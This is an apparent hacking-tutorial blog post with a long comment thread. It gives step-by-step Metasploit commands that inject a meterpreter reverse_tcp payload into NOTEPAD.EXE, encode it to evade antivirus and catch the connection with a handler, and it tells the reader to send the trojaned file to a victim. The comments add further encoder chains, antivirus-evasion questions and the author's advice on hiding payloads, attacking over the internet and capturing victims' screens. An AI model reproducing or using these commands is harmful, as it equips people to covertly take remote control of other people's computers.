Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps

Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps

Bookmark

How to Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps, have you imagine when you click and open your notepad application it contain backdoor or malicious codes? or when you start your windows o.s it also start explorer.exe services, but this explorer.exe containing backdoor or malicious codes? Actually embedding backdoor into EXE files isn’t something hard to do, but it’s very easy.. you can follow the tutorial below to prove that I’m true it’s easy :p LoL ๐Ÿ™‚

Requirement :

1. Metasploit Framework 3 (or Metasploit v2) 2. Linux OS(or you can use backtrack 5 that already include metasploit framework inside the Operating System)

Step By Step Create EXE Backdoor Using Metasploit and Backtrack 5:

1. First of all you should prepare your target EXE file. In this case I will use NOTEPAD.EXE.

2. Next, we use msfpayload to inject a meterpreter reverse payload into our executable(NOTEPAD.EXE) and encoded it 5 times(5 iterations) using shikata_ga_nai and save the backdoored file into Desktop(all code below is in one line).

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE

Create EXE Backdoor using metasploit and backtrack 5

3. Because we selected reverse meterpreter payload, we need to setup the exploit handler to handle the connection back to our attacking machine. In this case attacker use IP address 192.168.8.92. Go to Metasploit console by typing msfconsole, and then run :

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.92
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

Don’t forget to change LHOST with your own IP address and LPORT with your desired local port. Create exe backdoor using metasploit and backtrack 5

4. The next step we can send our special NOTEPAD.EXE files to victim, as soon as they download and open it, there’s meterpreter shell on victim computer : Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps

PWNED ๐Ÿ™‚ You also can learn how to implement this method to attack over the internet, but please read my previous tutorial about the logic how to attack network outside LAN / Attack WAN. Hope you found it useful for you. any comment or correction?please drop your comment below ๐Ÿ™‚

(Visited 3,601 times, 1 visits today)

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web.
Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Pingback: 5 Steps to Screen Capture Victim Screen Using Metasploit Meterpreter | Vishnu Valentino Hacking Tutorial, Tips and Trick()

  • tarish

    i cannot make it…my result is look like this
    root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

    [-] x86/shikata_ga_nai failed: No such file or directory – /root/Desktop/NOTEPAD.EXE
    [-] No encoders succeeded.

     
     
     

    • v4L

      #Tarish
      did you already put the original NOTEPAD.EXE in your desktop?

      • Vastrix

        try notepad.exe instead of NOTEPAD.EXE ๐Ÿ˜‰

      • Umesh Kumar Sharma

        hello sir , iam umesh sharma from India
        1. Sir i have read your all articles of metasploit backtrack5 with VMWARE Workstation about ethical hacking , to how to controll the outside network like my friend’s network having different local IP address and different public IP address , and i have gain lots of knowledge from these articles ,and i have also try this trick on my friend’s computers working with windows xp under the knowledge of my friends, I have already told my friends about this matter.

        2. Now sir, i want to discuss my problems those i have faced during this operation and i hope sir you will solve my problems

        3. i have used these codings for generating the payload.exe file
        (i) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 X > /root/payload.exe

        (this generate payload.exe file in my root directory but showing virus which is detected by “kespersky, Avira, Avg, quick heal antiviruses and so many others ” )
        (and then for connecting) i have used these parameters
        msfconsole
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST ” my local ip address ”
        set LPORT 4444
        exploit

        ( its not working, i mean to say that when i have opened the payload.exe file in my friends computer, No sending stage comes and no meterpreter session opened ) i have used pendrive to copy the payload.exe file in the friends computer because there is a problem to send this file with Gmail, yahoo,facebook,e-buddy messenger and other sites because this file contain virus and i have also removed the installed antivirus of friends computer and off the firewall detection. I have also change the extension of file from .exe to another extension when sending this file using the internet sites but the result is same its not work and shows the virus)

        (ii) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 X > /root/payload.exe
        msfconsole
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST ” my public ip address ”
        set LPORT 4444
        exploit

        (show the same problem which is written above)

        (iii) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
        >msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
        >msfencode -e x86/countdown -c 2 -t exe | \
        >msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
        >msfencode -x /root/notepad.exe -e x86/call4_dword_xor -t exe -c 5 -o notepad2.exe

        msfconsole
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST ” my local ip address ”
        set LPORT 4444
        exploit
        (show the same problem which is written above)

        (iv) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
        >msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
        >msfencode -e x86/countdown -c 2 -t exe | \
        >msfencode -e x86/shikata_ga_nai -c 5 -t exe | \
        >msfencode -x /root/notepad.exe -e x86/call4_dword_xor -t exe -c 5 -o notepad2.exe

        msfconsole
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST ” my public ip address ”
        set LPORT 4444
        exploit
        (show the same problem which is written above)

        (v) msfpayload windows/meterpreter/reverse_tcp LHOST=”my public IP address” LPORT=4444 R | \
        >msfencode -t exe -x /root/putty.exe -e x86/shikata_ga_nai -c 5 -o putty_backdoor.exe

        msfconsole
        use exploit/multi/handler
        set payload windows/meterpreter/reverse_tcp
        set LHOST ” my local ip address ”
        set LPORT 4444
        exploit
        (show the same problem which is written above)

        but when i work on local area network means on cafe, then its work but the problem of virus detection is same
        Sir, my question is :
        this procedure work on WAN or LAN?
        the problem of virus detection can be removed or not?
        If the problem of virus detection can remove, then please tell me how this problem can remove?
        how this procedure work on WAN. I mean to say that how i can open meterpreter session on my PC when i open the payload.exe file on my friends network or friends PC having different public ip address?

        (NOTE : During this operation my firewall also disabled)

        • v4L

          #Umesh Kumar Sharma
          Before you go to the WAN, you need to know the characteristic of network that “unmanageable” by you. This network usually set and configured by your ISP or internet provider. Most of internet service provider will flag packet that come to unknown port as malicious and they will dropped it down. You need to know what is the allowed port and what is not allowed port. That’s why in the example I put port 80 or 443 both for exploit or payload.

          • umesh sharma

            sir, thanks for reply
            but sir the problem of virus detection is remains a problem ,sir please tell me how the virus from payload.exe file can be removed ?, I have used all the codings those u have given, but the problem of virus detection is remains a problem , sir please give the particular solution for this problem

          • v4L

            #umesh
            about virus detection is like unending story. Once you “only find” the exploit in internet, just wait for an hours or days, then antivirus company will shut it down. You can find many tutorials about how to create your own exploit.

  • tarish

    thanks..now its working fine..

    Can you explain how to hack a remote pc with metasploit or SET cause i never hack a remote pc although installing a backdoor  my backtrack 5 machine wouldnot get any incoming connection from remote machine.i am using vmware workstation..please explain this matter..

    waiting for your better tutorial…thanks..

     

  • mehdi

    can i open the victim computer again after i shutdown without sending him anything

  • Anonymous

    Asswhole, fucking scams!!!!
    THIS CONNECTS TO HIS IP!! AND THEN LET'S HIM ACCESS YOUR PC! I AM GONNA SCREW UP YOUR IP!! ASSWHOLE AND THIS SITE IS GOING DOWN!!!

  • tester

    ^
    above poster is so lame
    on the other note, notepad2.exe just dies when i try to open it on victim(test) windows "program stopped working"  do you know why?

    • v4L

      #tester
      Yep just ignore it ๐Ÿ˜€ maybe he just start learn about computer security ๐Ÿ™‚
      are you using Windows 7 as your victim? if so, maybe the win 7 DEP and ASLR prevent it from working. you can try in windows xp

  • alpha

    hey i managed to exploit my xp computer! i want to try it on Win7 computer (x64)… is it possible? any help any idea plzz

    • v4L

      #alpha
      I haven’t try it on Win7 x64, but maybe it has different infrastructure with x86…

  • alpha

    hey thanx for a quick reply!
    have done it on win 7 32 bit (x86)? does it work on it or does it simply refuses to work on win7? what do you think about vista?

    • v4L

      #alpha
      No it can’t on Windows 7, it has DEP to prevent exploit execution..it works on Windows XP

  • Unknown

     
    i realized that session dies after victim closes our backdoor file in this case Notepad,
    and victim's AV Norton360 shows an alert that this file is not safe to run,
    any ways to solve those problems ?
    and i couldnt use your provided code i'm facing no encoder found and blah blah errors with that
    i use this which i found on some blogs:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=5610 R | /pentest/exploits/framework3/msfencode -t exe -x /root/Desktop/notepad.exe -k -o /root/Desktop/calc_backdoor.exe -e x86/shikata_ga_nai -c 5
     
    Any Guids ? solutions ?

  • Unknown

    oh i forget, thanks in advance ๐Ÿ˜ก Awesome blog and articles mate , keep it up

  • DeusIgni

    When the exploit is ran it displays “Handler failed to bind to (ip address)”. Why is that?
    -DeusIgni

  • DeusIgni

    Also, when flashdrive containing NOTEPAD2.EXE is opened on target, the system deletes it due to the fact that is has been found as a trojan virus. Is there anyway possible to overcome this without turning off the antivirus or having the target download the file? -DeusIgni

    • v4L

      #Deuslgni
      Yep that’s true it’s detected by antivirus…but my purpose here was the logic about how to create a backdoor…

  • DeusIgni

    Which was very astute tutorial, thank you for that.
    -DeusIgni

  • S2

    this is my problem:

    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

    [-] x86/shikata_ga_nai failed: Offset 0 outside of image source
    [-] No encoders succeeded.

    what is means by offset 0 outside of image source?

  • alex

    Hi. I want to encode virus.exe. When I use msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/virus.exe -o /root/Desktop/virus2.exe  – it didn't work. I don't get encrypted  file. Can you help me?

    • v4L

      #alex
      did the iteration already finished?or has some error message?the file should be placed on your desktop.

  • xuan

    Hi.

    after i double click the file notepad2.exe on win xp, it doesn’t have any respond.

    below is the console message

    ———————————–

    msf exploit(handler) > exploit

    [*] Started reverse handler on 192.168.77.128:443
    [*] Starting the payload handler…

    ————————————-

    what should i do? i using vmware workstation open bt5 and win xp.

    • v4L

      #xuan
      did you already set up your lhost to BT ip address?
      did you have any firewall/windows firewall on your XP machine?

    • Speedstr

      This method is now useless as it is detected by most av’s
      I am using my custom method to bypass av

  • love bt

    antivirus can find my backdoor why??????

    • v4L

      #love bt
      sure of course they will find it, you need learn how to hide it.
      FYI : Your AV database was updated automatically almost every 2 days. so you need to think for new method + possibility

      • Is hikata_ga_nai the best encode to use, I have heard that avoid_utf8_tolower might be a bit better?

        • v4L

          #jbone
          actually encoding purpose is hide the backdoor from AV; but nowadays they’re smart to identify malicious file with their specific algorithms, so to find which one better, maybe you can check is it detected by AV or not.

  • adigapro

    hi v4L and thanks for this tutorial it’s very useful

    I have a question :

    what i need to execute this payload from remote pc not in my network (like RAT )

    I tried this :

    I Forwarded the port 443 in my router and set for 192.168.1.4 ( my backtrack pc )

    and in the LHOST set to my STATIC IP(212.61.*.*)

    and execute it from remote pc (it’s ip is 78.93.*.* )

    but metasploit get not bind

    when i set LHOST =192.168.1.4

    it’s bind 192.168.1.4:443

    but it stay looooong and no any sessions opened

    please help me

    is this way in correct

    thanks

    • v4L

      #adigapro
      when you set the LHOST with your public IP and it forward the port 443 packet to your local network, did your BT receive something?if it receive some interaction, then it’s already connected

  • mouh

    how can i hack traget with wan ip

    • v4L

      #mouh
      see this post : http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • Dude dont be so rude when someone ask for help cause aint createing it , if anyone just sees this tutorial remember IoXx told you how
    this makes it and encodes it .
    msfpayload windows/meterpreter/reverse_tcp lhost=x.x.189.146 LPORT=443 X > /root/Desktop/NOTEPAD.EXE R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE

    and makes it remote
    by the way i aint stupid, i put a random ip there for a example

    • v4L

      #loxx
      LoL ๐Ÿ˜› only a stupid guy tell others “I’m a good guy” when there’s no one asking you ๐Ÿ™‚
      Maybe your neighbours in Windermere can teach you not to do a st*pid things ๐Ÿ™‚

  • cybersho

    this is my problem as well:

    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [-] x86/shikata_ga_nai failed: Offset 0 outside of image source

    [-] No encoders succeeded.

    The error is: offset 0 outside of image source

    How do I fix??

    Thanks

    • v4L

      #cybersho
      Have no idea, maybe others’ here?

  • irfan

    hi sir, please tell me, is that any way to create session with windows7 without open file.exe in windows7

    • v4L

      #irfan
      you can look other tutorial here : http://www./category/hacking-tutorial/

      • irfan

        i could not found any suitable tutorial in this article. please give me any other guideline about windows7 hack, without open file.exe which maked by any trojan. i want session hijack with windows7.

  • var

    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

    [-] x86/shikata_ga_nai failed: No such file or directory – /root/Desktop/notepad.exe
    [-] No encoders succeeded.

    …….now what???i am on backtrack 5 r2….

    • var

      thank you any way….solved it

  • nick

    which ip should i use to try to connect to my virtual machine ?
    i did ifconfig -a and i got vmnet8 inet addr as 192.168.131.1. but when i tried to use it, i didn’t get a connection.

    • v4L

      #nick
      you need to use bridge connection for your Virtual machine

  • Can i get screen shot from victim pc and get pass words from vistims pc

    • v4L

      #shakil
      yes, http://www./tips-and-trick/5-steps-to-screen-capture-victim-screen-using-metasploit-meterpreter/

      • Mustafa

        I am getting below error, Please help to solve this issue:

        Creating ‘cv.pdf’ file…
        [+] cv.pdf stored at /root/.msf4/local/cv.pdf
        msf exploit(adobe_jbig2decode) > use exploit/multihandler
        [-] Failed to load module: exploit/multihandler

        • v4L

          #Mustafa

          you missing the /. it should be multi/handler

  • Aloysious

    Hi buddy,
    First i want to thank you for the help you have provided on your website about metasploit. It has helped me a lot
    I have tried all the encoders multiple times in different ways. Most of anti-virus are able to detect the payload.
    Do you know to encrypt the payload and then decrypt it so that the anti-vir is unable to read the encrypted payload.

    Thanks in advance.

  • rhys

    Hello, i have created two blankfiles on the desktop notepad.exe and notepad2.exe when i encode them i get the following error

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -t exe -x Desktop/notepad.exe -k -o Desktop/notepad2.exe -c x86shikata_ga_nai -c 5
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

    [-] x86/shikata_ga_nai failed: Offset 0 outside of image source
    [*] php/base64 succeeded with size 526 (iteration=1)

    [*] php/base64 succeeded with size 724 (iteration=2)

    [*] php/base64 succeeded with size 989 (iteration=3)

    [*] php/base64 succeeded with size 1342 (iteration=4)

    [*] php/base64 succeeded with size 1813 (iteration=5)

    [-] php/base64 failed: Offset 0 outside of image source
    [*] cmd/generic_sh succeeded with size 290 (iteration=1)

    [*] cmd/generic_sh succeeded with size 290 (iteration=2)

    [*] cmd/generic_sh succeeded with size 290 (iteration=3)

    [*] cmd/generic_sh succeeded with size 290 (iteration=4)

    [*] cmd/generic_sh succeeded with size 290 (iteration=5)

    [-] cmd/generic_sh failed: Offset 0 outside of image source
    [*] sparc/longxor_tag succeeded with size 344 (iteration=1)

    [*] sparc/longxor_tag succeeded with size 396 (iteration=2)

    [*] sparc/longxor_tag succeeded with size 448 (iteration=3)

    [*] sparc/longxor_tag succeeded with size 500 (iteration=4)

    [*] sparc/longxor_tag succeeded with size 552 (iteration=5)

    [-] sparc/longxor_tag failed: Offset 0 outside of image source
    [-] mipsbe/longxor failed: wrong constant name #
    [-] mipsle/longxor failed: wrong constant name #
    [*] x86/fnstenv_mov succeeded with size 314 (iteration=1)

    [*] x86/fnstenv_mov succeeded with size 338 (iteration=2)

    [*] x86/fnstenv_mov succeeded with size 362 (iteration=3)

    [*] x86/fnstenv_mov succeeded with size 386 (iteration=4)

    [*] x86/fnstenv_mov succeeded with size 410 (iteration=5)

    [-] x86/fnstenv_mov failed: Offset 0 outside of image source
    [*] ppc/longxor succeeded with size 368 (iteration=1)

    [*] ppc/longxor succeeded with size 444 (iteration=2)

    [*] ppc/longxor succeeded with size 520 (iteration=3)

    [*] ppc/longxor succeeded with size 596 (iteration=4)

    [*] ppc/longxor succeeded with size 672 (iteration=5)

    [-] ppc/longxor failed: Offset 0 outside of image source
    [*] ppc/longxor_tag succeeded with size 364 (iteration=1)

    [*] ppc/longxor_tag succeeded with size 436 (iteration=2)

    [*] ppc/longxor_tag succeeded with size 508 (iteration=3)

    [*] ppc/longxor_tag succeeded with size 580 (iteration=4)

    [*] ppc/longxor_tag succeeded with size 652 (iteration=5)

    [-] ppc/longxor_tag failed: Offset 0 outside of image source
    [*] generic/none succeeded with size 290 (iteration=1)

    [*] generic/none succeeded with size 290 (iteration=2)

    [*] generic/none succeeded with size 290 (iteration=3)

    [*] generic/none succeeded with size 290 (iteration=4)

    [*] generic/none succeeded with size 290 (iteration=5)

    [-] generic/none failed: Offset 0 outside of image source
    [*] x64/xor succeeded with size 335 (iteration=1)

    [*] x64/xor succeeded with size 375 (iteration=2)

    [*] x64/xor succeeded with size 415 (iteration=3)

    [*] x64/xor succeeded with size 455 (iteration=4)

    [*] x64/xor succeeded with size 495 (iteration=5)

    [-] x64/xor failed: Offset 0 outside of image source
    [*] x86/call4_dword_xor succeeded with size 316 (iteration=1)

    [*] x86/call4_dword_xor succeeded with size 340 (iteration=2)

    [*] x86/call4_dword_xor succeeded with size 364 (iteration=3)

    [*] x86/call4_dword_xor succeeded with size 388 (iteration=4)

    [*] x86/call4_dword_xor succeeded with size 412 (iteration=5)

    [-] x86/call4_dword_xor failed: Offset 0 outside of image source
    [*] x86/jmp_call_additive succeeded with size 321 (iteration=1)

    [*] x86/jmp_call_additive succeeded with size 353 (iteration=2)

    [*] x86/jmp_call_additive succeeded with size 385 (iteration=3)

    [*] x86/jmp_call_additive succeeded with size 417 (iteration=4)

    [*] x86/jmp_call_additive succeeded with size 449 (iteration=5)

    [-] x86/jmp_call_additive failed: Offset 0 outside of image source
    [*] x86/countdown succeeded with size 308 (iteration=1)

    [*] x86/countdown succeeded with size 326 (iteration=2)

    [*] x86/countdown succeeded with size 344 (iteration=3)

    [*] x86/countdown succeeded with size 362 (iteration=4)

    [*] x86/countdown succeeded with size 380 (iteration=5)

    [-] x86/countdown failed: Offset 0 outside of image source
    [*] x86/nonalpha succeeded with size 410 (iteration=1)

    [-] x86/nonalpha failed: BadChar
    [-] x86/nonupper failed: Encoding failed due to a nil character
    [*] x86/alpha_upper succeeded with size 649 (iteration=1)

    [*] x86/alpha_upper succeeded with size 1367 (iteration=2)

    [*] x86/alpha_upper succeeded with size 2802 (iteration=3)

    [*] x86/alpha_upper succeeded with size 5673 (iteration=4)

    [*] x86/alpha_upper succeeded with size 11414 (iteration=5)

    [-] x86/alpha_upper failed: Offset 0 outside of image source
    [*] cmd/ifs succeeded with size 325 (iteration=1)

    [*] cmd/ifs succeeded with size 325 (iteration=2)

    [*] cmd/ifs succeeded with size 325 (iteration=3)

    [*] cmd/ifs succeeded with size 325 (iteration=4)

    [*] cmd/ifs succeeded with size 325 (iteration=5)

    [-] cmd/ifs failed: Offset 0 outside of image source
    [*] x86/alpha_mixed succeeded with size 641 (iteration=1)

    [*] x86/alpha_mixed succeeded with size 1344 (iteration=2)

    [*] x86/alpha_mixed succeeded with size 2749 (iteration=3)

    [*] x86/alpha_mixed succeeded with size 5559 (iteration=4)

    [*] x86/alpha_mixed succeeded with size 11179 (iteration=5)

    [-] x86/alpha_mixed failed: Offset 0 outside of image source
    /opt/metasploit/msf3/modules/encoders/x86/avoid_utf8_tolower.rb:146:in `decoder_stub’: The payload being encoded is of an incompatible size (73 bytes) from /opt/metasploit/msf3/lib/msf/core/encoder.rb:287:in `do_encode’
    from /opt/metasploit/msf3/lib/msf/core/encoder.rb:271:in `encode’
    from /opt/metasploit/msf3/msfencode:250:in `block (2 levels) in ‘
    from /opt/metasploit/msf3/msfencode:247:in `upto’
    from /opt/metasploit/msf3/msfencode:247:in `block in ‘
    from /opt/metasploit/msf3/msfencode:237:in `each’
    from /opt/metasploit/msf3/msfencode:237:in `’

    Any help?
    thanks

    • v4L

      #rhys
      try remove your -k in your command

      • rhys

        Thanks for the quick reply but no luck, i dont know whats wrong, although is it acceptable to put on the desktop 2 blank files (right click > create blank file) and to rename one to notepad.exe and the other to notepad2.exe

        • v4L

          #rhys
          no you can’t, or maybe you can try update your metasploit framework (run msfupdate).

  • rhys

    still no luck, what two exe files should i create on the desktop. thanks 

  • rhys

    What two files should be put on the desktop and where should I get them from. Also the update made no change. Just some more information I am running backtrack 5r3 gnome 64bit installed to the hard drive.

    • v4L

      #rhys
      ah you use 64bit, try to change the x86 to x64shikata_ga_nai

      • rhys

        Sorry, no luck, what files should i put on the desktop? you have used notepad.exe and a notepad2.exe but where do you get these files and what is the criteria for choosing these files? thank you for persevering i really appreciate it.

        • v4L

          #rhys
          it’s notepad.exe i got from c:\windows\system32, when i try another exe i still can encode it without error. :/?

  • rhys

    Solved it, had to set it to do the following to it. allow executing file as a program. removing -k and setting it to x64, the program i used was notepadd++ from http://notepad-plus-plus.org/download/v6.3.html and taada. you sir have a regular follower,
    thank you

  • umesh

    when i exploit the payload like that the message shows like that

    exploit
    started reverse handler ip:lport
    started payload handler
    killed

    after this message my process stops,
    is this the problem of network connection ?
    is this the problem of firewall on?

    but should be noted that my network and victim network is ok and my firewall is off.
    if there is any other suggestion then please give me thank u

    • umesh

      payload.exe file is still detected by antivirus after using all the codings
      i have also work on windows files like ” clbcatq.dll” and ” wuauclt.exe” but it is (payload.exe) still detected by antivirus
      i have also make my own exploit bt problem is still problem

      give ur suggestion

  • umesh

    the problem of virus detection is not removed
    i have also remove the unwanted characters/bad char/null bites ‘\x00\xff\xa1’ something like that from payload.exe file , bt it is still detected by antivirus
    how this problem can be removed

    • v4L

      #umesh
      I’ve already said to you on my last comment.
      “create your own exploit”…if you download or use exploit from internet(the free one) or from metasploit(free) the probability detected by antivirus is 99% and 1% success is for zeroday.
      if you want an instant one you can buy the exploit in 1337day.com

      • umesh sharma

        there is no any permanent way to remove this virus by the use of encoders, if the encoders are not working then why these encoders are given in the metasploit

        • v4L

          #umesh
          that’s why we need to learn ๐Ÿ™‚
          let say you’re a good people, can you think how much bad people out there that also use this encoder?
          you got the tutorial how to hide exploit from antivirus from the internet, do you think the antivirus company they will just sit down and relax without upgrading their system while they read the same tutorial?
          be realistic ๐Ÿ™‚
          that’s why I noted in my last comment, if you want the instant one, then you can buy it without do the research.

      • sao

        hi this was in regards to the injecting a exe into a custom PE like notepad.exe. Problem faced is when we create an exe and inject it in notepad.exe using -k option and try opening it in the windows platform the blank notepad opens up and then the shell code is executed. Now i want to know that is there a way where in the shell code can be executed without the notepad opening up.

      • umesh

        sir when i work on WAN port forward 4444 ..firewall checked….and public IP checked….

        Now the actual working is…

        use exploit multi/handler

        set payload windows/meterpreter/reverse_tcp

        set LHOST :local IP address

        set Lport : 4444

        exploit

        [*] started reverse handler on local IP:4444

        [*] started payload handler

        Ok now the actual problem comes after this session….sir when i click on payload file on WAN network….

        [*] sending stage ….
        this sending stage will comes bt no meterpreter session opened….sending stage comes means my file on WAN network works properly…it means connection established….bt no meterpreter session opened….i have checked the network signal on both side…

  • umesh sharma

    i have also removed the bad charasters or null characters ‘\x00\xff\xa1’ like that by using the various encoders but the problem of virus detection is remains a problem. i have also worked on ‘clbcatq.dll’and ‘wuauclt.exe’ windows files but the problem of virus detection is remains a problem
    how the virus can be removed
    i think virus cannot be removed because backtrack or linux is a backdoor testing machine not for virus removal

    if u have any other suggestion please give

  • sao

    vishnu i would like you to please help me out in reagrds to the problem i posted in my earlier post. your help will be highly solicitated

  • Abhijith

    Nice blog post but now this backdoor is detected ;[.

    I found another video about backdoor hope you like it. There are lots of videos but i only interested in creating a backdoors. Have a look if you like this video http://goo.gl/XlwJX

    • v4L

      #Abhijith
      Thanks for sharing ๐Ÿ™‚

  • umesh

    when i exploit the payload the message shows like that

    exploit
    started reverse handler ip:lport
    started payload handler
    killed

    after this message “killed” my process stops,
    is this the problem of network connection ?
    is this the problem of firewall on?

    but should be noted that my network and victim network is ok and my firewall is off.
    if there is any other suggestion then please give me thank u

  • Bob Mansfield

    Hello, i am getting this error. Could you please help as it would be much appreciated.

    Thank You

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.254 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

    [-] x86/shikata_ga_nai failed: Offset 0 outside of image source
    [-] No encoders succeeded.

  • Sir i have got some problem :
    can you please help me to solve it:
    “I have been using backtrack as my primary OS for my security programming right now I am stuck as although i have been able to find back doors on “IBL’s” security but haven’t been able to crack the cause OD this problem the “coroma sub-6″ hasn’t been much useful could you recommend a program for a better source rendering?”

    • v4L

      #icarus

      not understand your question??

  • Fulano

    When I try to encode with a calc.exe or a notepad.exe i always recieve this messege: “[-] x86/shikata_ga_nai failed: index 193536 out of string”

    Any idea what it can be?

  • ahsan tahir

    sir please tell me when i write this /root/notpad.exe>
    this shows messege <>
    and also i am using kali linux 2.0
    thanks please reply me as soon as possible

  • Bob

    I have a question my IP address is 192.168.1.13

    What if there is another with my Ip will test how the global network
    Help ??????????